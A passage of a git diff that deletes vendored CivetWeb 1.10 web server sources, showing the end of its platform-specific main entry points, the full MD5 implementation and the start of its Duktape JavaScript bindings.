-			freopen("CONOUT$", "w", stderr);
-		}
-	}
-
-	if (ok) {
-		SetConsoleTitle(g_server_name);
-	}
-
-	return ok;
-}
-
-
-int WINAPI
-WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR cmdline, int show)
-{
-	WNDCLASS cls;
-	HWND hWnd;
-	MSG msg;
-
-#if defined(DEBUG)
-	(void)MakeConsole();
-#endif
-
-	(void)hInst;
-	(void)hPrev;
-	(void)cmdline;
-	(void)show;
-
-	init_server_name((int)__argc, (const char **)__argv);
-	init_system_info();
-	memset(&cls, 0, sizeof(cls));
-	cls.lpfnWndProc = (WNDPROC)WindowProc;
-	cls.hIcon = LoadIcon(NULL, IDI_APPLICATION);
-	cls.lpszClassName = g_server_base_name;
-
-	RegisterClass(&cls);
-	hWnd = CreateWindow(cls.lpszClassName,
-	                    g_server_name,
-	                    WS_OVERLAPPEDWINDOW,
-	                    0,
-	                    0,
-	                    0,
-	                    0,
-	                    NULL,
-	                    NULL,
-	                    NULL,
-	                    NULL);
-	ShowWindow(hWnd, SW_HIDE);
-
-	if (g_icon_name) {
-		hIcon = (HICON)
-		    LoadImage(NULL, g_icon_name, IMAGE_ICON, 16, 16, LR_LOADFROMFILE);
-	} else {
-		hIcon = (HICON)LoadImage(GetModuleHandle(NULL),
-		                         MAKEINTRESOURCE(ID_ICON),
-		                         IMAGE_ICON,
-		                         16,
-		                         16,
-		                         0);
-	}
-
-	TrayIcon.cbSize = sizeof(TrayIcon);
-	TrayIcon.uID = ID_ICON;
-	TrayIcon.uFlags = NIF_ICON | NIF_MESSAGE | NIF_TIP;
-	TrayIcon.hIcon = hIcon;
-	TrayIcon.hWnd = hWnd;
-	snprintf(TrayIcon.szTip, sizeof(TrayIcon.szTip), "%s", g_server_name);
-	TrayIcon.uCallbackMessage = WM_USER;
-	Shell_NotifyIcon(NIM_ADD, &TrayIcon);
-
-	while (GetMessage(&msg, hWnd, 0, 0) > 0) {
-		TranslateMessage(&msg);
-		DispatchMessage(&msg);
-	}
-
-	free_system_info();
-
-	/* Return the WM_QUIT value. */
-	return (int)msg.wParam;
-}
-
-
-int
-main(int argc, char *argv[])
-{
-	(void)argc;
-	(void)argv;
-
-	return WinMain(0, 0, 0, 0);
-}
-
-
-#elif defined(USE_COCOA)
-#import <Cocoa/Cocoa.h>
-
-@interface Civetweb : NSObject <NSApplicationDelegate>
-- (void)openBrowser;
-- (void)shutDown;
-@end
-
-@implementation Civetweb
-- (void)openBrowser
-{
-	[[NSWorkspace sharedWorkspace]
-	    openURL:[NSURL URLWithString:[NSString stringWithUTF8String:
-	                                               get_url_to_first_open_port(
-	                                                   g_ctx)]]];
-}
-- (void)editConfig
-{
-	create_config_file(g_ctx, g_config_file_name);
-	NSString *path = [NSString stringWithUTF8String:g_config_file_name];
-	if (![[NSWorkspace sharedWorkspace] openFile:path
-	                             withApplication:@"TextEdit"]) {
-		NSAlert *alert = [[[NSAlert alloc] init] autorelease];
-		[alert setAlertStyle:NSWarningAlertStyle];
-		[alert setMessageText:NSLocalizedString(@"Unable to open config file.",
-		                                        "")];
-		[alert setInformativeText:path];
-		(void)[alert runModal];
-	}
-}
-- (void)shutDown
-{
-	[NSApp terminate:nil];
-}
-@end
-
-int
-main(int argc, char *argv[])
-{
-	init_server_name(argc, (const char **)argv);
-	init_system_info();
-	start_civetweb(argc, argv);
-
-	[NSAutoreleasePool new];
-	[NSApplication sharedApplication];
-
-	/* Add delegate to process menu item actions */
-	Civetweb *myDelegate = [[Civetweb alloc] autorelease];
-	[NSApp setDelegate:myDelegate];
-
-	/* Run this app as agent */
-	ProcessSerialNumber psn = {0, kCurrentProcess};
-	TransformProcessType(&psn, kProcessTransformToBackgroundApplication);
-	SetFrontProcess(&psn);
-
-	/* Add status bar menu */
-	id menu = [[NSMenu new] autorelease];
-
-	/* Add version menu item */
-	[menu
-	    addItem:
-	        [[[NSMenuItem alloc]
-	            /*initWithTitle:[NSString stringWithFormat:@"%s", server_name]*/
-	            initWithTitle:[NSString stringWithUTF8String:g_server_name]
-	                   action:@selector(noexist)
-	            keyEquivalent:@""] autorelease]];
-
-	/* Add configuration menu item */
-	[menu addItem:[[[NSMenuItem alloc] initWithTitle:@"Edit configuration"
-	                                          action:@selector(editConfig)
-	                                   keyEquivalent:@""] autorelease]];
-
-	/* Add connect menu item */
-	[menu
-	    addItem:[[[NSMenuItem alloc] initWithTitle:@"Open web root in a browser"
-	                                        action:@selector(openBrowser)
-	                                 keyEquivalent:@""] autorelease]];
-
-	/* Separator */
-	[menu addItem:[NSMenuItem separatorItem]];
-
-	/* Add quit menu item */
-	[menu addItem:[[[NSMenuItem alloc] initWithTitle:@"Quit"
-	                                          action:@selector(shutDown)
-	                                   keyEquivalent:@"q"] autorelease]];
-
-	/* Attach menu to the status bar */
-	id item = [[[NSStatusBar systemStatusBar]
-	    statusItemWithLength:NSVariableStatusItemLength] retain];
-	[item setHighlightMode:YES];
-	[item setImage:[NSImage imageNamed:@"civetweb_22x22.png"]];
-	[item setMenu:menu];
-
-	/* Run the app */
-	[NSApp activateIgnoringOtherApps:YES];
-	[NSApp run];
-
-	stop_civetweb();
-	free_system_info();
-
-	return EXIT_SUCCESS;
-}
-
-#else
-
-int
-main(int argc, char *argv[])
-{
-	init_server_name(argc, (const char **)argv);
-	init_system_info();
-	start_civetweb(argc, argv);
-	fprintf(stdout,
-	        "%s started on port(s) %s with web root [%s]\n",
-	        g_server_name,
-	        mg_get_option(g_ctx, "listening_ports"),
-	        mg_get_option(g_ctx, "document_root"));
-
-	while (g_exit_flag == 0) {
-		sleep(1);
-	}
-
-	fprintf(stdout,
-	        "Exiting on signal %d, waiting for all threads to finish...",
-	        g_exit_flag);
-	fflush(stdout);
-	stop_civetweb();
-	fprintf(stdout, "%s", " done.\n");
-
-	free_system_info();
-
-	return EXIT_SUCCESS;
-}
-#endif /* _WIN32 */
diff --git a/thirdparty/civetweb-1.10/src/md5.inl b/thirdparty/civetweb-1.10/src/md5.inl
deleted file mode 100644
index be7192b..0000000
--- a/thirdparty/civetweb-1.10/src/md5.inl
+++ /dev/null
@@ -1,471 +0,0 @@
-/*
- * This an amalgamation of md5.c and md5.h into a single file
- * with all static declaration to reduce linker conflicts
- * in Civetweb.
- *
- * The MD5_STATIC declaration was added to facilitate static
- * inclusion.
- * No Face Press, LLC
- */
-
-/* $Id: md5.h,v 1.4 2002/04/13 19:20:28 lpd Exp $ */
-/*
-  Independent implementation of MD5 (RFC 1321).
-
-  This code implements the MD5 Algorithm defined in RFC 1321, whose
-  text is available at
-    http://www.ietf.org/rfc/rfc1321.txt
-  The code is derived from the text of the RFC, including the test suite
-  (section A.5) but excluding the rest of Appendix A.  It does not include
-  any code or documentation that is identified in the RFC as being
-  copyrighted.
-
-  The original and principal author of md5.h is L. Peter Deutsch
-  <ghost@aladdin.com>.  Other authors are noted in the change history
-  that follows (in reverse chronological order):
-
-  2002-04-13 lpd Removed support for non-ANSI compilers; removed
-    references to Ghostscript; clarified derivation from RFC 1321;
-    now handles byte order either statically or dynamically.
-  1999-11-04 lpd Edited comments slightly for automatic TOC extraction.
-  1999-10-18 lpd Fixed typo in header comment (ansi2knr rather than md5);
-    added conditionalization for C++ compilation from Martin
-    Purschke <purschke@bnl.gov>.
-  1999-05-03 lpd Original version.
- */
-
-#ifndef md5_INCLUDED
-#define md5_INCLUDED
-
-/*
- * This package supports both compile-time and run-time determination of CPU
- * byte order.  If ARCH_IS_BIG_ENDIAN is defined as 0, the code will be
- * compiled to run only on little-endian CPUs; if ARCH_IS_BIG_ENDIAN is
- * defined as non-zero, the code will be compiled to run only on big-endian
- * CPUs; if ARCH_IS_BIG_ENDIAN is not defined, the code will be compiled to
- * run on either big- or little-endian CPUs, but will run slightly less
- * efficiently on either one than if ARCH_IS_BIG_ENDIAN is defined.
- */
-
-typedef unsigned char md5_byte_t; /* 8-bit byte */
-typedef unsigned int md5_word_t;  /* 32-bit word */
-
-/* Define the state of the MD5 Algorithm. */
-typedef struct md5_state_s {
-	md5_word_t count[2]; /* message length in bits, lsw first */
-	md5_word_t abcd[4];  /* digest buffer */
-	md5_byte_t buf[64];  /* accumulate block */
-} md5_state_t;
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-/* Initialize the algorithm. */
-MD5_STATIC void md5_init(md5_state_t *pms);
-
-/* Append a string to the message. */
-MD5_STATIC void
-md5_append(md5_state_t *pms, const md5_byte_t *data, size_t nbytes);
-
-/* Finish the message and return the digest. */
-MD5_STATIC void md5_finish(md5_state_t *pms, md5_byte_t digest[16]);
-
-#ifdef __cplusplus
-} /* end extern "C" */
-#endif
-
-#endif /* md5_INCLUDED */
-
-/*
-  Copyright (C) 1999, 2000, 2002 Aladdin Enterprises.  All rights reserved.
-
-  This software is provided 'as-is', without any express or implied
-  warranty.  In no event will the authors be held liable for any damages
-  arising from the use of this software.
-
-  Permission is granted to anyone to use this software for any purpose,
-  including commercial applications, and to alter it and redistribute it
-  freely, subject to the following restrictions:
-
-  1. The origin of this software must not be misrepresented; you must not
-     claim that you wrote the original software. If you use this software
-     in a product, an acknowledgment in the product documentation would be
-     appreciated but is not required.
-  2. Altered source versions must be plainly marked as such, and must not be
-     misrepresented as being the original software.
-  3. This notice may not be removed or altered from any source distribution.
-
-  L. Peter Deutsch
-  ghost@aladdin.com
-
- */
-/* $Id: md5.c,v 1.6 2002/04/13 19:20:28 lpd Exp $ */
-/*
-  Independent implementation of MD5 (RFC 1321).
-
-  This code implements the MD5 Algorithm defined in RFC 1321, whose
-  text is available at
-    http://www.ietf.org/rfc/rfc1321.txt
-  The code is derived from the text of the RFC, including the test suite
-  (section A.5) but excluding the rest of Appendix A.  It does not include
-  any code or documentation that is identified in the RFC as being
-  copyrighted.
-
-  The original and principal author of md5.c is L. Peter Deutsch
-  <ghost@aladdin.com>.  Other authors are noted in the change history
-  that follows (in reverse chronological order):
-
-  2002-04-13 lpd Clarified derivation from RFC 1321; now handles byte order
-    either statically or dynamically; added missing #include <string.h>
-    in library.
-  2002-03-11 lpd Corrected argument list for main(), and added int return
-    type, in test program and T value program.
-  2002-02-21 lpd Added missing #include <stdio.h> in test program.
-  2000-07-03 lpd Patched to eliminate warnings about "constant is
-    unsigned in ANSI C, signed in traditional"; made test program
-    self-checking.
-  1999-11-04 lpd Edited comments slightly for automatic TOC extraction.
-  1999-10-18 lpd Fixed typo in header comment (ansi2knr rather than md5).
-  1999-05-03 lpd Original version.
- */
-
-#ifndef MD5_STATIC
-#include <string.h>
-#endif
-
-#undef BYTE_ORDER /* 1 = big-endian, -1 = little-endian, 0 = unknown */
-#ifdef ARCH_IS_BIG_ENDIAN
-#define BYTE_ORDER (ARCH_IS_BIG_ENDIAN ? 1 : -1)
-#else
-#define BYTE_ORDER (0)
-#endif
-
-#define T_MASK ((md5_word_t)~0)
-#define T1 /* 0xd76aa478 */ (T_MASK ^ 0x28955b87)
-#define T2 /* 0xe8c7b756 */ (T_MASK ^ 0x173848a9)
-#define T3 (0x242070db)
-#define T4 /* 0xc1bdceee */ (T_MASK ^ 0x3e423111)
-#define T5 /* 0xf57c0faf */ (T_MASK ^ 0x0a83f050)
-#define T6 (0x4787c62a)
-#define T7 /* 0xa8304613 */ (T_MASK ^ 0x57cfb9ec)
-#define T8 /* 0xfd469501 */ (T_MASK ^ 0x02b96afe)
-#define T9 (0x698098d8)
-#define T10 /* 0x8b44f7af */ (T_MASK ^ 0x74bb0850)
-#define T11 /* 0xffff5bb1 */ (T_MASK ^ 0x0000a44e)
-#define T12 /* 0x895cd7be */ (T_MASK ^ 0x76a32841)
-#define T13 (0x6b901122)
-#define T14 /* 0xfd987193 */ (T_MASK ^ 0x02678e6c)
-#define T15 /* 0xa679438e */ (T_MASK ^ 0x5986bc71)
-#define T16 (0x49b40821)
-#define T17 /* 0xf61e2562 */ (T_MASK ^ 0x09e1da9d)
-#define T18 /* 0xc040b340 */ (T_MASK ^ 0x3fbf4cbf)
-#define T19 (0x265e5a51)
-#define T20 /* 0xe9b6c7aa */ (T_MASK ^ 0x16493855)
-#define T21 /* 0xd62f105d */ (T_MASK ^ 0x29d0efa2)
-#define T22 (0x02441453)
-#define T23 /* 0xd8a1e681 */ (T_MASK ^ 0x275e197e)
-#define T24 /* 0xe7d3fbc8 */ (T_MASK ^ 0x182c0437)
-#define T25 (0x21e1cde6)
-#define T26 /* 0xc33707d6 */ (T_MASK ^ 0x3cc8f829)
-#define T27 /* 0xf4d50d87 */ (T_MASK ^ 0x0b2af278)
-#define T28 (0x455a14ed)
-#define T29 /* 0xa9e3e905 */ (T_MASK ^ 0x561c16fa)
-#define T30 /* 0xfcefa3f8 */ (T_MASK ^ 0x03105c07)
-#define T31 (0x676f02d9)
-#define T32 /* 0x8d2a4c8a */ (T_MASK ^ 0x72d5b375)
-#define T33 /* 0xfffa3942 */ (T_MASK ^ 0x0005c6bd)
-#define T34 /* 0x8771f681 */ (T_MASK ^ 0x788e097e)
-#define T35 (0x6d9d6122)
-#define T36 /* 0xfde5380c */ (T_MASK ^ 0x021ac7f3)
-#define T37 /* 0xa4beea44 */ (T_MASK ^ 0x5b4115bb)
-#define T38 (0x4bdecfa9)
-#define T39 /* 0xf6bb4b60 */ (T_MASK ^ 0x0944b49f)
-#define T40 /* 0xbebfbc70 */ (T_MASK ^ 0x4140438f)
-#define T41 (0x289b7ec6)
-#define T42 /* 0xeaa127fa */ (T_MASK ^ 0x155ed805)
-#define T43 /* 0xd4ef3085 */ (T_MASK ^ 0x2b10cf7a)
-#define T44 (0x04881d05)
-#define T45 /* 0xd9d4d039 */ (T_MASK ^ 0x262b2fc6)
-#define T46 /* 0xe6db99e5 */ (T_MASK ^ 0x1924661a)
-#define T47 (0x1fa27cf8)
-#define T48 /* 0xc4ac5665 */ (T_MASK ^ 0x3b53a99a)
-#define T49 /* 0xf4292244 */ (T_MASK ^ 0x0bd6ddbb)
-#define T50 (0x432aff97)
-#define T51 /* 0xab9423a7 */ (T_MASK ^ 0x546bdc58)
-#define T52 /* 0xfc93a039 */ (T_MASK ^ 0x036c5fc6)
-#define T53 (0x655b59c3)
-#define T54 /* 0x8f0ccc92 */ (T_MASK ^ 0x70f3336d)
-#define T55 /* 0xffeff47d */ (T_MASK ^ 0x00100b82)
-#define T56 /* 0x85845dd1 */ (T_MASK ^ 0x7a7ba22e)
-#define T57 (0x6fa87e4f)
-#define T58 /* 0xfe2ce6e0 */ (T_MASK ^ 0x01d3191f)
-#define T59 /* 0xa3014314 */ (T_MASK ^ 0x5cfebceb)
-#define T60 (0x4e0811a1)
-#define T61 /* 0xf7537e82 */ (T_MASK ^ 0x08ac817d)
-#define T62 /* 0xbd3af235 */ (T_MASK ^ 0x42c50dca)
-#define T63 (0x2ad7d2bb)
-#define T64 /* 0xeb86d391 */ (T_MASK ^ 0x14792c6e)
-
-static void
-md5_process(md5_state_t *pms, const md5_byte_t *data /*[64]*/)
-{
-	md5_word_t a = pms->abcd[0], b = pms->abcd[1], c = pms->abcd[2],
-	           d = pms->abcd[3];
-	md5_word_t t;
-#if BYTE_ORDER > 0
-	/* Define storage only for big-endian CPUs. */
-	md5_word_t X[16];
-#else
-	/* Define storage for little-endian or both types of CPUs. */
-	md5_word_t xbuf[16];
-	const md5_word_t *X;
-#endif
-
-	{
-#if BYTE_ORDER == 0
-		/*
-		 * Determine dynamically whether this is a big-endian or
-		 * little-endian machine, since we can use a more efficient
-		 * algorithm on the latter.
-		 */
-		static const int w = 1;
-
-		if (*((const md5_byte_t *)&w)) /* dynamic little-endian */
-#endif
-#if BYTE_ORDER <= 0 /* little-endian */
-		{
-			/*
-			 * On little-endian machines, we can process properly aligned
-			 * data without copying it.
-			 */
-			if (!((data - (const md5_byte_t *)0) & 3)) {
-				/* data are properly aligned, a direct assignment is possible */
-				/* cast through a (void *) should avoid a compiler warning,
-				   see
-				   https://github.com/bel2125/civetweb/issues/94#issuecomment-98112861
-				   */
-				X = (const md5_word_t *)(const void *)data;
-			} else {
-				/* not aligned */
-				memcpy(xbuf, data, 64);
-				X = xbuf;
-			}
-		}
-#endif
-#if BYTE_ORDER == 0
-		else /* dynamic big-endian */
-#endif
-#if BYTE_ORDER >= 0 /* big-endian */
-		{
-			/*
-			 * On big-endian machines, we must arrange the bytes in the
-			 * right order.
-			 */
-			const md5_byte_t *xp = data;
-			int i;
-
-#if BYTE_ORDER == 0
-			X = xbuf; /* (dynamic only) */
-#else
-#define xbuf X /* (static only) */
-#endif
-			for (i = 0; i < 16; ++i, xp += 4)
-				xbuf[i] = (md5_word_t)(xp[0]) + (md5_word_t)(xp[1] << 8)
-				          + (md5_word_t)(xp[2] << 16)
-				          + (md5_word_t)(xp[3] << 24);
-		}
-#endif
-	}
-
-#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32 - (n))))
-
-/* Round 1. */
-/* Let [abcd k s i] denote the operation
-   a = b + ((a + F(b,c,d) + X[k] + T[i]) <<< s). */
-#define F(x, y, z) (((x) & (y)) | (~(x) & (z)))
-#define SET(a, b, c, d, k, s, Ti)                                              \
-	t = a + F(b, c, d) + X[k] + Ti;                                            \
-	a = ROTATE_LEFT(t, s) + b
-
-	/* Do the following 16 operations. */
-	SET(a, b, c, d, 0, 7, T1);
-	SET(d, a, b, c, 1, 12, T2);
-	SET(c, d, a, b, 2, 17, T3);
-	SET(b, c, d, a, 3, 22, T4);
-	SET(a, b, c, d, 4, 7, T5);
-	SET(d, a, b, c, 5, 12, T6);
-	SET(c, d, a, b, 6, 17, T7);
-	SET(b, c, d, a, 7, 22, T8);
-	SET(a, b, c, d, 8, 7, T9);
-	SET(d, a, b, c, 9, 12, T10);
-	SET(c, d, a, b, 10, 17, T11);
-	SET(b, c, d, a, 11, 22, T12);
-	SET(a, b, c, d, 12, 7, T13);
-	SET(d, a, b, c, 13, 12, T14);
-	SET(c, d, a, b, 14, 17, T15);
-	SET(b, c, d, a, 15, 22, T16);
-#undef SET
-
-/* Round 2. */
-/* Let [abcd k s i] denote the operation
-     a = b + ((a + G(b,c,d) + X[k] + T[i]) <<< s). */
-#define G(x, y, z) (((x) & (z)) | ((y) & ~(z)))
-#define SET(a, b, c, d, k, s, Ti)                                              \
-	t = a + G(b, c, d) + X[k] + Ti;                                            \
-	a = ROTATE_LEFT(t, s) + b
-
-	/* Do the following 16 operations. */
-	SET(a, b, c, d, 1, 5, T17);
-	SET(d, a, b, c, 6, 9, T18);
-	SET(c, d, a, b, 11, 14, T19);
-	SET(b, c, d, a, 0, 20, T20);
-	SET(a, b, c, d, 5, 5, T21);
-	SET(d, a, b, c, 10, 9, T22);
-	SET(c, d, a, b, 15, 14, T23);
-	SET(b, c, d, a, 4, 20, T24);
-	SET(a, b, c, d, 9, 5, T25);
-	SET(d, a, b, c, 14, 9, T26);
-	SET(c, d, a, b, 3, 14, T27);
-	SET(b, c, d, a, 8, 20, T28);
-	SET(a, b, c, d, 13, 5, T29);
-	SET(d, a, b, c, 2, 9, T30);
-	SET(c, d, a, b, 7, 14, T31);
-	SET(b, c, d, a, 12, 20, T32);
-#undef SET
-
-/* Round 3. */
-/* Let [abcd k s t] denote the operation
-     a = b + ((a + H(b,c,d) + X[k] + T[i]) <<< s). */
-#define H(x, y, z) ((x) ^ (y) ^ (z))
-#define SET(a, b, c, d, k, s, Ti)                                              \
-	t = a + H(b, c, d) + X[k] + Ti;                                            \
-	a = ROTATE_LEFT(t, s) + b
-
-	/* Do the following 16 operations. */
-	SET(a, b, c, d, 5, 4, T33);
-	SET(d, a, b, c, 8, 11, T34);
-	SET(c, d, a, b, 11, 16, T35);
-	SET(b, c, d, a, 14, 23, T36);
-	SET(a, b, c, d, 1, 4, T37);
-	SET(d, a, b, c, 4, 11, T38);
-	SET(c, d, a, b, 7, 16, T39);
-	SET(b, c, d, a, 10, 23, T40);
-	SET(a, b, c, d, 13, 4, T41);
-	SET(d, a, b, c, 0, 11, T42);
-	SET(c, d, a, b, 3, 16, T43);
-	SET(b, c, d, a, 6, 23, T44);
-	SET(a, b, c, d, 9, 4, T45);
-	SET(d, a, b, c, 12, 11, T46);
-	SET(c, d, a, b, 15, 16, T47);
-	SET(b, c, d, a, 2, 23, T48);
-#undef SET
-
-/* Round 4. */
-/* Let [abcd k s t] denote the operation
-     a = b + ((a + I(b,c,d) + X[k] + T[i]) <<< s). */
-#define I(x, y, z) ((y) ^ ((x) | ~(z)))
-#define SET(a, b, c, d, k, s, Ti)                                              \
-	t = a + I(b, c, d) + X[k] + Ti;                                            \
-	a = ROTATE_LEFT(t, s) + b
-
-	/* Do the following 16 operations. */
-	SET(a, b, c, d, 0, 6, T49);
-	SET(d, a, b, c, 7, 10, T50);
-	SET(c, d, a, b, 14, 15, T51);
-	SET(b, c, d, a, 5, 21, T52);
-	SET(a, b, c, d, 12, 6, T53);
-	SET(d, a, b, c, 3, 10, T54);
-	SET(c, d, a, b, 10, 15, T55);
-	SET(b, c, d, a, 1, 21, T56);
-	SET(a, b, c, d, 8, 6, T57);
-	SET(d, a, b, c, 15, 10, T58);
-	SET(c, d, a, b, 6, 15, T59);
-	SET(b, c, d, a, 13, 21, T60);
-	SET(a, b, c, d, 4, 6, T61);
-	SET(d, a, b, c, 11, 10, T62);
-	SET(c, d, a, b, 2, 15, T63);
-	SET(b, c, d, a, 9, 21, T64);
-#undef SET
-
-	/* Then perform the following additions. (That is increment each
-	   of the four registers by the value it had before this block
-	   was started.) */
-	pms->abcd[0] += a;
-	pms->abcd[1] += b;
-	pms->abcd[2] += c;
-	pms->abcd[3] += d;
-}
-
-MD5_STATIC void
-md5_init(md5_state_t *pms)
-{
-	pms->count[0] = pms->count[1] = 0;
-	pms->abcd[0] = 0x67452301;
-	pms->abcd[1] = /*0xefcdab89*/ T_MASK ^ 0x10325476;
-	pms->abcd[2] = /*0x98badcfe*/ T_MASK ^ 0x67452301;
-	pms->abcd[3] = 0x10325476;
-}
-
-MD5_STATIC void
-md5_append(md5_state_t *pms, const md5_byte_t *data, size_t nbytes)
-{
-	const md5_byte_t *p = data;
-	size_t left = nbytes;
-	size_t offset = (pms->count[0] >> 3) & 63;
-	md5_word_t nbits = (md5_word_t)(nbytes << 3);
-
-	if (nbytes <= 0)
-		return;
-
-	/* Update the message length. */
-	pms->count[1] += (md5_word_t)(nbytes >> 29);
-	pms->count[0] += nbits;
-	if (pms->count[0] < nbits)
-		pms->count[1]++;
-
-	/* Process an initial partial block. */
-	if (offset) {
-		size_t copy = (offset + nbytes > 64 ? 64 - offset : nbytes);
-
-		memcpy(pms->buf + offset, p, copy);
-		if (offset + copy < 64)
-			return;
-		p += copy;
-		left -= copy;
-		md5_process(pms, pms->buf);
-	}
-
-	/* Process full blocks. */
-	for (; left >= 64; p += 64, left -= 64)
-		md5_process(pms, p);
-
-	/* Process a final partial block. */
-	if (left)
-		memcpy(pms->buf, p, left);
-}
-
-MD5_STATIC void
-md5_finish(md5_state_t *pms, md5_byte_t digest[16])
-{
-	static const md5_byte_t pad[64] = {0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-	                                   0,    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-	                                   0,    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-	                                   0,    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-	                                   0,    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0};
-	md5_byte_t data[8];
-	int i;
-
-	/* Save the length before padding. */
-	for (i = 0; i < 8; ++i)
-		data[i] = (md5_byte_t)(pms->count[i >> 2] >> ((i & 3) << 3));
-	/* Pad to 56 bytes mod 64. */
-	md5_append(pms, pad, ((55 - (pms->count[0] >> 3)) & 63) + 1);
-	/* Append the length. */
-	md5_append(pms, data, 8);
-	for (i = 0; i < 16; ++i)
-		digest[i] = (md5_byte_t)(pms->abcd[i >> 2] >> ((i & 3) << 3));
-}
-
-
-/* End of md5.inl */
diff --git a/thirdparty/civetweb-1.10/src/mod_duktape.inl b/thirdparty/civetweb-1.10/src/mod_duktape.inl
deleted file mode 100644
index 85e822a..0000000
--- a/thirdparty/civetweb-1.10/src/mod_duktape.inl
+++ /dev/null
@@ -1,262 +0,0 @@
-/* This file is part of the CivetWeb web server.
- * See https://github.com/civetweb/civetweb/
- * (C) 2015-2017 by the CivetWeb authors, MIT license.
- */
-
-#include "duktape.h"
-
-/* TODO: the mg context should be added to duktape as well */
-/* Alternative: redefine a new, clean API from scratch (instead of using mg),
- * or at least do not add problematic functions. */
-/* For evaluation purposes, currently only "send" is supported.
- * All other ~50 functions will be added later. */
-
-/* Note: This is only experimental support, so the API may still change. */
-
-static const char *civetweb_conn_id = "\xFF"
-                                      "civetweb_conn";
-static const char *civetweb_ctx_id = "\xFF"
-                                     "civetweb_ctx";
-
-
-static void *
-mg_duk_mem_alloc(void *udata, duk_size_t size)
-{
-	return mg_malloc_ctx(size, (struct mg_context *)udata);
-}
-
-
-static void *
-mg_duk_mem_realloc(void *udata, void *ptr, duk_size_t newsize)
-{
-	return mg_realloc_ctx(ptr, newsize, (struct mg_context *)udata);
-}
-
-
-static void
-mg_duk_mem_free(void *udata, void *ptr)
-{
-	(void)udata;
-	mg_free(ptr);
-}
-
-
-static void
-mg_duk_fatal_handler(duk_context *duk_ctx, duk_errcode_t code, const char *msg)
-{
-	/* Script is called "protected" (duk_peval_file), so script errors should
-	 * never yield in a call to this function. Maybe calls prior to executing
-	 * the script could raise a fatal error. */
-	struct mg_connection *conn;
-
-	duk_push_global_stash(duk_ctx);
-	duk_get_prop_string(duk_ctx, -1, civetweb_conn_id);
-	conn = (struct mg_connection *)duk_to_pointer(duk_ctx, -1);
-
-	mg_cry(conn, "JavaScript fatal (%u): %s", (unsigned)code, msg);
-}
-
-
-static duk_ret_t
-duk_itf_write(duk_context *duk_ctx)
-{
-	struct mg_connection *conn;
-	duk_double_t ret;
-	duk_size_t len = 0;
-	const char *val = duk_require_lstring(duk_ctx, -1, &len);
-
-	/*
-	    duk_push_global_stash(duk_ctx);
-	    duk_get_prop_string(duk_ctx, -1, civetweb_conn_id);
-	    conn = (struct mg_connection *)duk_to_pointer(duk_ctx, -1);
-	*/
-	duk_push_current_function(duk_ctx);
-	duk_get_prop_string(duk_ctx, -1, civetweb_conn_id);
-	conn = (struct mg_connection *)duk_to_pointer(duk_ctx, -1);
-
-	if (!conn) {
-		duk_error(duk_ctx,
-		          DUK_ERR_INTERNAL_ERROR,
-		          "function not available without connection object");
-		/* probably never reached, but satisfies static code analysis */
-		return DUK_RET_INTERNAL_ERROR;
-	}
-
-	ret = mg_write(conn, val, len);
-
-	duk_push_number(duk_ctx, ret);
-	return 1;
-}
-
-
-static duk_ret_t
-duk_itf_read(duk_context *duk_ctx)
-{
-	struct mg_connection *conn;
-	char buf[1024];
-	int len;
-
-	duk_push_global_stash(duk_ctx);
-	duk_get_prop_string(duk_ctx, -1, civetweb_conn_id);
-	conn = (struct mg_connection *)duk_to_pointer(duk_ctx, -1);
-
-	if (!conn) {
-		duk_error(duk_ctx,
-		          DUK_ERR_INTERNAL_ERROR,
-		          "function not available without connection object");
-		/* probably never reached, but satisfies static code analysis */
-		return DUK_RET_INTERNAL_ERROR;
-	}
-
-	len = mg_read(conn, buf, sizeof(buf));
-
-	duk_push_lstring(duk_ctx, buf, len);
-	return 1;
-}
-
-
-static duk_ret_t
-duk_itf_getoption(duk_context *duk_ctx)
-{
-	struct mg_context *cv_ctx;
-	const char *ret;
-	duk_size_t len = 0;
-	const char *val = duk_require_lstring(duk_ctx, -1, &len);
-
-	duk_push_current_function(duk_ctx);
-	duk_get_prop_string(duk_ctx, -1, civetweb_ctx_id);
-	cv_ctx = (struct mg_context *)duk_to_pointer(duk_ctx, -1);
-
-	if (!cv_ctx) {
-		duk_error(duk_ctx,
-		          DUK_ERR_INTERNAL_ERROR,
-		          "function not available without connection object");
-		/* probably never reached, but satisfies static code analysis */
-		return DUK_RET_INTERNAL_ERROR;
-	}
-
-	ret = mg_get_option(cv_ctx, val);
-	if (ret) {
-		duk_push_string(duk_ctx, ret);
-	} else {
-		duk_push_null(duk_ctx);
-	}
-
-	return 1;
-}
-
-
-static void
-mg_exec_duktape_script(struct mg_connection *conn, const char *script_name)
-{
-	int i;
-	duk_context *duk_ctx = NULL;
-
-	conn->must_close = 1;
-
-	/* Create Duktape interpreter state */
-	duk_ctx = duk_create_heap(mg_duk_mem_alloc,
-	                          mg_duk_mem_realloc,
-	                          mg_duk_mem_free,
-	                          (void *)conn->ctx,
-	                          mg_duk_fatal_handler);
-	if (!duk_ctx) {
-		mg_cry(conn, "Failed to create a Duktape heap.");
-		goto exec_duktape_finished;
-	}
-
-	/* Add "conn" object */
-	duk_push_global_object(duk_ctx);
-	duk_push_object(duk_ctx); /* create a new table/object ("conn") */
-
-	duk_push_c_function(duk_ctx, duk_itf_write, 1 /* 1 = nargs */);
-	duk_push_pointer(duk_ctx, (void *)conn);
-	duk_put_prop_string(duk_ctx, -2, civetweb_conn_id);
-	duk_put_prop_string(duk_ctx, -2, "write"); /* add function conn.write */
-
-	duk_push_c_function(duk_ctx, duk_itf_read, 0 /* 0 = nargs */);
-	duk_push_pointer(duk_ctx, (void *)conn);
-	duk_put_prop_string(duk_ctx, -2, civetweb_conn_id);
-	duk_put_prop_string(duk_ctx, -2, "read"); /* add function conn.read */
-
-	duk_push_string(duk_ctx, conn->request_info.request_method);
-	duk_put_prop_string(duk_ctx,
-	                    -2,
-	                    "request_method"); /* add string conn.r... */
-
-	duk_push_string(duk_ctx, conn->request_info.request_uri);
-	duk_put_prop_string(duk_ctx, -2, "request_uri");
-
-	duk_push_string(duk_ctx, conn->request_info.local_uri);
